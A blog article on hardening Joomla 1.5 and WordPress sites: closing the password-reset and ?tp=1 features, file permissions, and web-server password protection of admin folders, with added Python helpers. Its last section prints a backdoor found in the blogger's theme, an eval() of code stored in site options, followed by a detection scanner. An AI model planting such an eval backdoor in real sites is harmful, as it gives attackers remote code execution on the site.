It will be about double authentication to enter the admin panel of the engine your site (should work on any CMS, but I personally only tested on WordPress and Joomla). Protection is set at the server level, so all attempts to guess the password to the admin panel (brute force) will not create an increased load on the hosting and it is quite difficult to bypass it. It is set up easily (literally in a few steps) and of all the knowledge it requires only attentiveness and the ability to access the site via FTP.

Well, I'll also describe a couple of things I did to sites on the already obsolete Joomla 1.5 engine, which it makes no real sense for me to migrate, but which keep getting hacked and used to send spam from the server. I did this only recently, so I cannot yet state as a fact that the infections have stopped, but I hope so. In short, I tried to improve the hack resistance of Joomla 1.5 a little.

How to protect Joomla 1.5 from hacks and viruses

As I mentioned above, the problem is the constant hacking of my two sites running Joomla 1.5. You could consider them abandoned, because I don't add new material to them, but they regularly bring in income (from posting articles via Miralinks and Webartex, and links from Gogetlinks). In short, it's a pity to throw them away, and migrating them to a new version of the engine is not worth the time and effort.

It remains either to constantly monitor the load on the server and, when it increases, look for shells and other malware among the engine files, or somehow strengthen protection. To search for malware, I download the engine files to a computer and check them with DoctorWeb and Aibolit. The former does not find everything, and the latter sees the enemy too often where he is not, but I don’t know any other effective methods. Although, there are also dozens of programs, but this is already more convenient for anyone.

By the way, the script Aibolit can work not only on the server, but also directly on the computer in the folder with the downloaded engine files (just don’t forget to turn off the standard antivirus when downloading the site, because it can fix some of the files, but they will still remain on the server).

Detailed instructions are given in the video below, and in short, you download the PHP language interpreter from the Microsoft website and install it. After that, open the Aibolit script file called ai-bolit.php using this very interpreter:

The crawl speed depends on the speed of your computer and the number of files in your site engine. It took me several hours for the https: // site, because even Aibolit suspects pictures of hiding viruses, and I have a lot of these same pictures, and cache files take a lot of time when scanning. For sites on Joomla 1.5, the check was much faster.

I decided to spend a day looking for ways to improve site security. Not that much was achieved, but it is still better than nothing. Let's start with strengthening the protection of the two Joomla 1.5 sites by reducing their vulnerabilities. The following has been done:


How else to protect Joomla 1.5 from viruses and stream hacks

  1. Also, "specialists" assure that Joomla 1.5 sites are cracked in no time through the password reset feature built into the engine (through it you can supposedly change the admin password). Even if you do not use registration on your site and do not display a password recovery link anywhere, this does not mean that you have covered this vulnerability. Just add the following snippet to your site's home page URL and you will get the feature in question: /index.php?option=com_user&view=reset

    To close this loophole (though I still don't understand how it could be used for hacking), you can simply delete this file:

    /components/com_user/models/reset.php

    True, after that none of the users registered on your site will be able to use the password recovery function, but for me that was not important, because registration was not offered.

  2. They also say that such a useful little thing as adding ?tp=1 to the page address also allows virus writers and other hunters of other people's property to reach some sensitive areas of your site and do something destructive there, or abuse it in some other way. This is again removed by editing one of the engine files: /libraries/Joomla/application/module/helper.php

    There you need to remove two pieces of code, or comment them out by enclosing them in /* and */ (commented-out code is not executed by the PHP interpreter). The first snippet is:

    if (count($result) == 0) {
        if (JRequest::getBool("tp")) {
            // ?tp=1 turns every empty position into a placeholder module that prints its own name
            $result = JModuleHelper::getModule("mod_".$position);
            $result->title = $position;
            $result->content = $position;
            $result->position = $position;
        }
    }

    And the second one is:

    if (JRequest::getBool("tp")) {
        // ?tp=1 also draws an outline around every rendered module
        $attribs["style"] .= " outline";
    }

    After that, clear the cache and try to view the module positions in your template using the following construction:

    https://website/?tp=1

    If it no longer works, then you have hopefully closed this hole.

  3. Very often, sites are hacked not from the outside but from the inside. Trojans and keyloggers on your computer know what to look for and where, so do not store passwords in FTP clients (there is an option for this case). It is even better to disable access to your site via plain FTP altogether and instead use a protocol in which the transmitted information (including passwords) is encrypted, which makes intercepting it useless. To be honest, I neglect this last piece of advice out of my own ignorance. There is also the option of allowing regular FTP access to your site only from a specific IP address (your computer), but my ISP gives me a dynamic IP (it changes within a certain range).
  4. It is also advised to set the access rights on the engine's files and folders no higher than those actually required for it to work. In fact, I didn't think about it much and set them according to the usual template: 755 for folders and 644 for files. All this can be done with the same FileZilla. Moreover, these rights must be applied not only to the directories in the root folder, but also to all directories and files inside them.

    I set the rights to 444 on the files in the root folder, and 705 on the tmp and logs directories. Of course, it would be possible to "clamp down" more tightly, but I don't have much experience in this, and there was no time to waste on experiments. Besides, all this will not seriously deter hackers, because there are things that can nullify all our efforts. To do this, use the following commands:

    Therefore, in order to completely "concrete" the Joomla 1.5 engine files against hacking and encroachment, it is necessary to prohibit changing the access rights of files and folders through PHP. This is done in the server settings, but I don't know how and where yet. If you know, please post a link.

  5. All of the above is designed to reduce the likelihood of your site being hacked and infested with shells and other malware. However, the precautions taken are no guarantee, so it would be great to have protection on the server itself as well (where your Joomla 1.5 site lives). That would neutralise whatever nastiness slipped through. However, again, I personally have not implemented this yet out of my own ignorance. I would be grateful for links to materials explaining this process.
  6. Very often sites are hacked by gaining access to the administrative panel. It is clear that it is password-protected, but using brute force (intelligent guessing) many even seemingly complex passwords are cracked in no time. Therefore the admin panel needs to be protected too, and it is better to do this not with additional extensions but with the help of the server. There are several protection options. For example, you can change the URL of the admin panel in one way or another so that the hacker cannot even start his dirty business.

    Another method of protection, which will be described in detail below, is to create an additional barrier in the way of an intruder (a living person or a script). It consists in password-protecting the directory with the admin files (in Joomla this is the administrator folder, in WordPress wp-admin) using the web server. As a result, when accessing the admin panel you will first need to enter a username and password to access the folder, and only then a username and password for the engine's admin panel itself. Moreover, a bot brute-forcing this first line of defense does not create any significant additional load on the server, since the web server rejects the request before the engine's PHP code is ever run, which is good.

  7. Another very important note, in my opinion, for protecting your sites from hacking and virus infection is to follow the rule: one site, one hosting account. Yes, it's more expensive, but much safer. When placed on one account, all your sites immediately become available via FTP as soon as malware gains access to only one of them. Sites are hacked automatically, and it would be unreasonable to hope that the scripts do not walk up the directory tree. In addition, it is very difficult to clean up a bunch of sites on one hosting account, because while dealing with one site you lose sight of the already cleaned one, which is being re-infected in the meantime.
  8. By the way, a break-in can come not only through your own site but also through the site of your hosting neighbor, if the hoster did not properly take care to exclude this possibility. The hosting panel itself can also be hacked (this has happened), but in any case the number of hacks due to the hoster's fault is negligible compared to the number due to the carelessness of site owners.
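A check for the file-permission policy from item 4 (755 for directories, 644 for files, 444 for the files directly in the root, 705 for tmp and logs), applied recursively as the text requires: an added Python example, not code from the article or from Joomla, that reports every entry granting more than the policy allows and can tighten it. It does not address chmod() calls made from PHP, which the text leaves open, and the sample site tree it builds is constructed for the demonstration.

```python
import os
import stat
import tempfile

# Policy from the text: 755 for directories, 644 for files, 444 for files
# directly in the web root, 705 for the tmp and logs directories.
DIR_MODE, FILE_MODE, ROOT_FILE_MODE, WRITABLE_DIR_MODE = 0o755, 0o644, 0o444, 0o705
WRITABLE_DIRS = {"tmp", "logs"}


def allowed_mode(root, path, is_dir):
    """The most permissive mode the policy grants to this entry."""
    rel = os.path.relpath(path, root)
    if is_dir:
        return WRITABLE_DIR_MODE if rel in WRITABLE_DIRS else DIR_MODE
    return ROOT_FILE_MODE if os.sep not in rel else FILE_MODE


def audit_permissions(root):
    """List (relative path, actual mode, allowed mode) for every entry wider than the policy."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        entries = [(d, True) for d in dirnames] + [(f, False) for f in filenames]
        for name, is_dir in entries:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):  # never chmod through a symlink
                continue
            mode = stat.S_IMODE(os.lstat(path).st_mode)
            allowed = allowed_mode(root, path, is_dir)
            if mode & ~allowed:  # stricter than the policy is fine, wider is not
                findings.append((os.path.relpath(path, root), mode, allowed))
    return sorted(findings)


def tighten(root, dry_run=True):
    """Clear the offending bits; returns [(relative path, old, new)] in octal."""
    changes = []
    for rel, mode, allowed in audit_permissions(root):
        if not dry_run:
            os.chmod(os.path.join(root, rel), mode & allowed)
        changes.append((rel, oct(mode), oct(mode & allowed)))
    return changes


def make_demo_tree():
    """Constructed sample site with a few too-permissive entries, for a dry run."""
    root = tempfile.mkdtemp()
    for d, m in (("tmp", 0o777), ("components", 0o755), ("components/com_user", 0o750)):
        os.makedirs(os.path.join(root, d))
        os.chmod(os.path.join(root, d), m)
    for f, m in (("configuration.php", 0o644), ("components/com_user/reset.php", 0o666)):
        open(os.path.join(root, f), "w").close()
        os.chmod(os.path.join(root, f), m)
    return root
```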

How to protect the admin area of your site from hacking?

I want to talk in detail about the method of protection that I recently used myself. It consists in restricting access to the folder where the files of the site's administrative panel are located. The restriction is set using the wonderful .htaccess file, which in effect lets you remotely control the settings of the web server your site is installed on. Moreover, it can do so selectively.

All directives written in .htaccess apply only to the directory in which it is located (and everything below it). Want to change something in the settings for the entire site? Then put .htaccess in the root folder. We are interested in settings for only the folder with the admin panel files, so we will put it there. In Joomla this is the administrator folder, in WordPress it is wp-admin.

However, one .htaccess is not enough for us. You will also need .htpasswd, where the login and password for access to this administrative folder are stored. Moreover, the password is stored not in the clear but as an MD5 hash. The password cannot be recovered from it, but when you enter the correct combination in the password field, the web server computes the MD5 hash of that combination and compares it with what is stored in .htpasswd. If they match, you are allowed into the Joomla or WordPress admin area; if not, you are not.

That's all; it remains only to bring the plan to life. You need to add some directives to .htaccess. Do you know which ones? I don't. And somehow you will also need to turn the password into its MD5 form. A problem. However, it has a fairly simple solution. Kind people have set up an online service that generates the contents of the .htaccess and .htpasswd files from the login and password you came up with. True, you will also have to specify the absolute path to the administrative folder, but that is a trifle.

So, meet the great and terrible protection generator for your site's admin panel. Clear, right? Come up with (preferably using some generator) two of the most complex combinations of letters, numbers and symbols, and enter them in the top two fields. Just don't forget to write them down, or put them in a password manager, otherwise you won't be able to get into the admin panel yourself and will have to redo everything described in this part.

Now the absolute path. Do you know it? Even if you don't, don't worry. Connect to the site via FTP, create a file with any name in its root (even url_path.php will do) and put this simple code in it:

<?php
// Prints the server-side location of this script; the directory part is the absolute path you need
echo "Full path to the script and its name: " . $_SERVER["SCRIPT_FILENAME"] . "<br>";
echo "Script name: " . $_SERVER["SCRIPT_NAME"];
?>

Then go to the browser and enter this URL in the address bar (with your domain, of course):

https://website/url_path.php

As a result you will see the absolute path you were interested in (take the directory part, without the url_path.php file name itself). Enter it into the .htaccess and .htpasswd generator above. Don't forget to append the name of the administrator or wp-admin folder to the end of this path, without a trailing slash. That's it, now click the "Generate" button. Delete url_path.php from the server afterwards, since it discloses your directory layout to anyone who requests it.

Then copy the generated content for .htaccess and .htpasswd into these files, respectively.

I hope you have already created them in the administrator or wp-admin folder (depending on the engine you use)?

Well, now try to go to the admin panel. Does a window appear asking for a username and password from your web server? It looks different in different browsers, but in Chrome it looks like this:

If something doesn't work, double-check the absolute path to .htpasswd specified in the .htaccess file; in that case, just correct it manually when editing the file. That's all I wanted to tell you today. If you want to scold me or add something, go ahead.
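What the online generator does, written out as an added Python example (not the article's code and not the service it links to): it produces the Apache "$apr1$" salted MD5-crypt hash that .htpasswd stores, checks a password against it the way the web server does, and emits the four .htaccess directives for a given absolute path. The user name, password and path used in the test are made-up values.

```python
import hashlib
import secrets

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"  # crypt alphabet


def _to64(value, count):
    # Emit `count` six-bit groups of `value`, least significant group first.
    return "".join(ITOA64[(value >> (6 * i)) & 0x3F] for i in range(count))


def apr1_md5_crypt(password, salt=None):
    """Apache '$apr1$' MD5-crypt, the format `htpasswd -m` stores in .htpasswd."""
    pw = password.encode("utf-8")
    if salt is None:  # eight random characters from the crypt alphabet
        salt = "".join(secrets.choice(ITOA64) for _ in range(8))
    sb = salt[:8].encode("ascii")
    ctx = hashlib.md5(pw + b"$apr1$" + sb)
    alt = hashlib.md5(pw + sb + pw).digest()
    for left in range(len(pw), 0, -16):  # mix in 'alt' once per 16 bytes of pw
        ctx.update(alt[:min(left, 16)])
    bit = len(pw)
    while bit:  # the historical bit-walk over the password length
        ctx.update(b"\0" if bit & 1 else pw[:1])
        bit >>= 1
    final = ctx.digest()
    for i in range(1000):  # stretching rounds, identical to glibc's $1$ scheme
        c = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            c.update(sb)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    triples = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    enc = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
                  for a, b, c in triples) + _to64(final[11], 2)
    return "$apr1$%s$%s" % (sb.decode("ascii"), enc)


def check_password(password, stored_hash):
    # What the web server does on each login: re-hash with the stored salt and compare.
    salt = stored_hash.split("$")[2]
    return secrets.compare_digest(apr1_md5_crypt(password, salt), stored_hash)


def generate(user, password, admin_dir_abs):
    """Return the .htpasswd line and the .htaccess text for admin_dir_abs."""
    htpasswd_line = "%s:%s" % (user, apr1_md5_crypt(password))
    htaccess = ("AuthType Basic\nAuthName \"Restricted area\"\n"
                "AuthUserFile %s/.htpasswd\nRequire valid-user\n"
                % admin_dir_abs.rstrip("/"))
    return htpasswd_line, htaccess
```

Default Apache configurations refuse to serve files whose names start with .ht, which is why the generator can keep .htpasswd inside the protected folder; confirm that with a direct browser request if your host's configuration differs. Apache 2.4's own htpasswd tool can also store bcrypt hashes (htpasswd -B), which is the stronger choice where the server supports it.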

Virus in WordPress?

After writing this article, I discovered malware on my blog (https://site) (or at least something installed without my consent). I just wanted to change something in the code and got into the template's footer. At the very bottom, just before the closing Body tag, I was struck by a call to some function unfamiliar to me (I googled its name but found nothing worthwhile):

The name seemed plausible. Remarkably, three weeks earlier I had accidentally discovered a new table in the databases of two of my WordPress blogs (https://site and another). Its name was just wonderful: wp-config. Googling this name again gave nothing worthwhile, because all the answers related to the file of the same name, wp-config.php.

This table quickly grew in size (up to hundreds of megabytes on https://site), and the addresses of my site's pages with various parameters were written into it. Not understanding the point of this process, I simply dropped the table, and that was it. By the way, I have another WordPress blog, but nothing of the kind was seen there.

Well, having found such a "telling" insert in the theme, I also decided to check whether something matching the line described above had been added to the theme's functions.php. It turned out that it had. And so neatly: neither at the very top nor at the very bottom, but the second (or third) function from the top:

function wp_custom_page_links_return() {
    $option = get_option("wp_custom_page_links");
    @eval($option);
}
@eval(get_option("wp_brlinks"));

This is where the wonderful eval catches the eye. Remarkably, Aibolit (described above) had flagged this fragment as suspicious, but I hadn't got around to it yet, because this script suspects too many things of unreliability. I also googled this code and found a post (unfortunately that domain is now blocked for non-payment) describing a similar problem. That person picked up this filth with a new theme, into which some kind of installation code had been sewn.

The themes on both infected blogs have been in place for many years. Probably there was some vulnerability in the engine or elsewhere, which ill-wishers quickly (in bulk) took advantage of. In general, check for yourself that there are no such inclusions. The modification date of the files described fell, as far as I can tell, in mid-September of this year.
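One way to do the "check for yourself" the text asks for: an added Python example (not the article's code and not Aibolit) that scans a theme's PHP files for the pattern shown above, eval() of a value loaded with get_option(), whether called directly or through a variable, plus the usual decode functions. The functions.php sample is constructed for the demonstration and is not taken from any real theme.

```python
import os
import re

# Constructed sample of a theme functions.php with the kind of insert the
# article describes (an option-driven eval); not taken from any real theme.
SAMPLE_FUNCTIONS_PHP = """<?php
add_action('init', 'theme_setup');
function theme_setup() { register_nav_menu('main', 'Main'); }
function wp_custom_page_links_return() {
    $option = get_option("wp_custom_page_links");
    @eval($option);
}
@eval(get_option("wp_brlinks"));
function theme_footer() { echo base64_decode($GLOBALS['x']); }
"""
# Single-line rules; a legitimate theme has no reason to eval() anything.
RULES = [
    ("eval-call", re.compile(r"\beval\s*\(")),
    ("eval-of-option", re.compile(r"\beval\s*\(\s*get_option\s*\(")),
    ("obfuscated-decode", re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\(")),
]
OPTION_ASSIGN = re.compile(r"\$(\w+)\s*=\s*get_option\s*\(")
EVAL_OF_VAR = re.compile(r"\beval\s*\(\s*\$(\w+)\s*\)")


def scan_php(source):
    """Return [(line_no, rule_name, stripped line)] for every suspicious line.
    Also remembers variables loaded from get_option() and flags a later eval() of one."""
    hits, from_option = [], set()
    for no, line in enumerate(source.splitlines(), 1):
        for name, rx in RULES:
            if rx.search(line):
                hits.append((no, name, line.strip()))
        m = OPTION_ASSIGN.search(line)
        if m:
            from_option.add(m.group(1))
        m = EVAL_OF_VAR.search(line)
        if m and m.group(1) in from_option:  # the two-line form shown on the page
            hits.append((no, "eval-of-stored-option", line.strip()))
    return hits


def scan_theme_dir(theme_dir):
    """Map each .php file under theme_dir (relative path) to its hits."""
    report = {}
    for dirpath, _, files in os.walk(theme_dir):
        for f in files:
            if not f.endswith(".php"):
                continue
            path = os.path.join(dirpath, f)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_php(fh.read())
            if hits:
                report[os.path.relpath(path, theme_dir)] = hits
    return report
```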

I also advise you to look at a selection of 17 video tutorials on securing Joomla sites. They play one after another automatically, and if you like you can switch to the next lesson using the corresponding button on the player panel, or choose the lesson you want from the drop-down menu in the upper left corner of the player window:

Enjoy watching!

Good luck! See you soon on the pages of this blog.
